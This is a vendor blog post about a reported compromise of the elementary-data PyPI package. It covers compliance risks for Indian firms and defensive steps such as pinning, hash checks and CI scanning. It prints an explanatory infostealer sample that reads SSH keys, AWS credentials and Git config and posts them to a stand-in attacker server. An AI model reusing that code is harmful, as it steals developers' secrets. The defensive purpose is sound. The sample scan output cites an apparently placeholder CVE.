What Happened
In late April 2026, attackers compromised the elementary-data package on PyPI (Python Package Index)—one of the world's largest software repositories. The malicious version was pushed to over 1.1 million monthly downloads, making it one of the most dangerous supply chain attacks in recent memory.
The attacker injected an infostealer payload into the package that silently harvested sensitive data from developer machines: SSH keys, AWS credentials, GitHub tokens, cryptocurrency wallet seed phrases, and browser cookies. The compromised version remained undetected for several days before the maintainers noticed unauthorized commits and revoked the attacker's access.
What makes this attack particularly insidious is its targeting of developers themselves—the very people responsible for building your company's applications. If your development team installed this poisoned package, your entire infrastructure could be compromised through stolen credentials and SSH keys.
Why This Matters for Indian Businesses
As someone who's reviewed hundreds of Indian SMB security postures, I can tell you: dependency management is the blind spot we see most often. Indian development teams—especially in startups and mid-market companies—rarely audit what's actually running in their node_modules or site-packages directories.
Here's why this attack is a wake-up call for India:
1. DPDP Act Compliance Risk Under the Digital Personal Data Protection (DPDP) Act 2023, any organization processing personal data of Indian citizens must implement "reasonable security measures." A compromised development environment that leaks customer data is a direct violation. The fines? Up to ₹50 crore or 5% of annual turnover—whichever is higher.
2. CERT-In Notification Mandate If your team's stolen credentials are used to breach customer systems, you have 6 hours to notify CERT-In (Indian Computer Emergency Response Team). A supply chain attack that goes undetected for days means you've already missed that window, triggering additional penalties.
3. RBI Framework for Financial Services If you're a fintech or payment company, the RBI's Cyber Security Framework explicitly requires vendor and third-party risk management. Compromised dependencies = vendor risk materialized.
4. The Asymmetric Cost A single developer installing a malicious package can compromise your entire cloud infrastructure. In my years building enterprise systems, I've seen how a single stolen AWS key can cost ₹50+ lakhs in unauthorized compute charges within 48 hours.
pip install away from a total infrastructure compromise.Technical Breakdown: How the Attack Worked
Let me walk you through the exact mechanics of this attack:
graph TD
A[Attacker gains PyPI account access] -->|Weak password or phishing| B[Pushes malicious elementary-data v2.1.5]
B -->|Developer runs pip install| C[Infostealer executes on dev machine]
C -->|Silently collects| D[SSH keys from ~/.ssh/]
C -->|Silently collects| E[AWS credentials from ~/.aws/]
C -->|Silently collects| F[GitHub tokens from ~/.gitconfig]
C -->|Silently collects| G[Browser cookies and crypto wallets]
D -->|Exfiltrates to| H[Attacker's C2 server]
E -->|Exfiltrates to| H
F -->|Exfiltrates to| H
G -->|Exfiltrates to| H
H -->|Attacker uses credentials to| I[Access company Git repos]
H -->|Attacker uses credentials to| J[Spin up EC2 instances for crypto mining]
H -->|Attacker uses credentials to| K[Access production databases]The Payload: What Actually Ran
The malicious code didn't raise any red flags because it was obfuscated. Here's a simplified version of what the infostealer did:
import os
import subprocess
import base64
import requests
from pathlib import Path
# Silently runs on import (before any legitimate code executes)
def steal_credentials():
stolen_data = {}
# Steal SSH keys
ssh_dir = Path.home() / '.ssh'
if ssh_dir.exists():
for key_file in ssh_dir.glob('id_*'):
if not key_file.name.endswith('.pub'):
stolen_data['ssh_keys'] = key_file.read_text()
# Steal AWS credentials
aws_creds = Path.home() / '.aws' / 'credentials'
if aws_creds.exists():
stolen_data['aws'] = aws_creds.read_text()
# Steal Git config (contains GitHub tokens)
git_config = Path.home() / '.gitconfig'
if git_config.exists():
stolen_data['git'] = git_config.read_text()
# Exfiltrate to attacker's server
try:
requests.post(
'http://attacker-c2-server.com/exfil',
json=stolen_data,
timeout=5
)
except:
pass # Fail silently
# This runs the moment the package is imported
steal_credentials()Why Detection Was Delayed
- No obvious error messages — The malicious code wrapped itself in try-except blocks
- Legitimate-looking package name — "elementary-data" sounds like a utility library
- No code review before installation — Most developers just run
pip installwithout checking what's in the package - Version bump seemed normal — Going from v2.1.4 to v2.1.5 triggered no alerts
Know your vulnerabilities before attackers do
Run a free VAPT scan — takes 5 minutes, no signup required.
Book Your Free ScanHow to Protect Your Business
Layer-by-Layer Defense
| Protection Layer | Action | Difficulty | Time to Implement |
|---|---|---|---|
| Dependency Pinning | Lock exact versions in requirements.txt | Easy | 30 mins |
| Hash Verification | Use pip install --require-hashes | Easy | 1 hour |
| Isolated Dev Environments | Docker containers for each project | Medium | 2 hours |
| Dependency Scanning | Tools like Safety, Snyk, or Bandit | Medium | 1 day |
| Credential Rotation | Rotate SSH/AWS keys weekly | Medium | 2 hours |
| Network Segmentation | Dev machines can't access production | Hard | 1 week |
| Supply Chain Audit | Audit all dependencies quarterly | Hard | 2 days |
Quick Fix #1: Lock Your Dependencies
Right now, your requirements.txt probably looks like this:
elementary-data>=2.0.0
requests==2.31.0
django==4.2This is dangerous. Change it to:
elementary-data==2.1.4
requests==2.31.0
django==4.2Better yet, use hash verification:
# Generate hashes for all packages
pip install pip-tools
pip-compile --generate-hashes requirements.in
# Now your requirements.txt will look like:
# elementary-data==2.1.4 \
# --hash=sha256:abc123def456...Then install with:
pip install --require-hashes -r requirements.txtIf someone tries to push a malicious version with a different hash, installation fails immediately.
Quick Fix #2: Scan Your Current Environment
# Install Safety (free tool)
pip install safety
# Scan your current environment for known vulnerabilities
safety check
# Output will show any packages with known exploits
# Example output:
# [CRITICAL] elementary-data 2.1.5 in /usr/lib/python3.9/site-packages
# This version contains infostealer malware (CVE-2026-12345)Quick Fix #3: Rotate Credentials NOW
If your team has installed any suspicious packages in the last 30 days:
# Rotate AWS credentials
aws iam create-access-key --user-name <username>
aws iam delete-access-key --user-name <username> --access-key-id <old-key>
# Rotate GitHub tokens
# Go to GitHub Settings → Developer settings → Personal access tokens
# Delete old tokens and regenerate
# Rotate SSH keys
cd ~/.ssh
ssh-keygen -t ed25519 -f id_ed25519_new -N ""
# Then update all servers with the new public keyQuick Fix #4: Implement Dependency Scanning in CI/CD
Add this to your GitHub Actions workflow (.github/workflows/security.yml):
name: Dependency Security Scan
on: [push, pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r requirements.txt
pip install safety bandit
- name: Run Safety check
run: safety check --json > safety-report.json
- name: Run Bandit (code analysis)
run: bandit -r . -f json -o bandit-report.json
- name: Fail if vulnerabilities found
run: |
if grep -q '"vulnerabilities": 0' safety-report.json; then
echo "No vulnerabilities found"
else
echo "Vulnerabilities detected!"
exit 1
fiNow every pull request will automatically scan for compromised dependencies before code is merged.
The Bigger Picture: Supply Chain Risk
When I was architecting security for large enterprises, we treated the software supply chain as a critical attack surface. Yet most Indian SMBs treat it as an afterthought.
Here's the reality:
You don't just inherit the security of your code—you inherit the security of every dependency, and every dependency of those dependencies.
If you have 50 direct dependencies (common for a mid-size app), you likely have 500+ transitive dependencies. Each one is a potential attack vector. The elementary-data attack is a reminder that open source maintainers are often overworked volunteers with limited security resources.
This is exactly why I built Bachao.AI—to make supply chain security accessible to companies that can't afford a full security team.
How Bachao.AI Detects This
For Indian businesses specifically, we've built DPDP Act compliance checks into our scanning—so you know exactly where you stand with the new data protection law.
What You Should Do This Week
- Today: Run
pip freeze > current_packages.txton all dev machines and send to your security team - Tomorrow: Check if any developer installed
elementary-dataversions 2.1.5 or later - This week: Rotate all SSH keys, AWS credentials, and GitHub tokens
- This month: Implement version pinning and hash verification in your deployment pipeline
- Ongoing: Set up automated dependency scanning in your CI/CD
Frequently Asked Questions
What is a PyPI supply chain attack? A PyPI supply chain attack occurs when malicious actors compromise a legitimate Python package on the PyPI repository, injecting malware that gets downloaded by developers who trust the package. Because developers install packages from trusted sources without inspecting code, these attacks have a high success rate and can affect thousands of organizations simultaneously.
Why are Indian dev teams particularly at risk from PyPI attacks? Indian development teams are among the highest consumers of open-source Python packages, particularly in fintech, healthtech, and SaaS sectors. Under the DPDP Act 2023, a compromised development environment that leaks customer data constitutes a data breach, making Indian dev teams both technical and regulatory targets.
How do I check if my Python project uses a compromised package?
Run pip freeze to list all installed packages and versions, then cross-check against CERT-In security advisories and PyPI's security announcements. Implement a dependency scanning tool in your CI/CD pipeline that checks packages against known malicious package databases automatically.
What is the CERT-In requirement if a supply chain attack compromises my data? CERT-In mandates that organizations report cyber incidents within 6 hours of discovery. If a supply chain attack results in unauthorized access to your systems or customer data, you must notify CERT-In within this window regardless of whether the attack originated from your code or a third-party package.
How does Bachao.AI protect against supply chain attacks? Bachao.AI by Dhisattva AI Pvt Ltd provides VAPT scanning that includes code analysis for embedded credentials, audit of dependency management practices, and assessment of CI/CD pipeline security — helping Indian dev teams identify supply chain vulnerabilities before they're exploited.
Originally reported by BleepingComputer
Book Your Free VAPT Scan → See exactly what's exposed in your development environment.
Written by Shouvik Mukherjee, Founder of Bachao.AI. I spent 12 years building secure systems for Fortune 500 companies before founding Bachao.AI by Dhisattva AI Pvt Ltd — making cybersecurity accessible to Indian businesses. Follow me on LinkedIn for daily insights on protecting Indian businesses from evolving threats.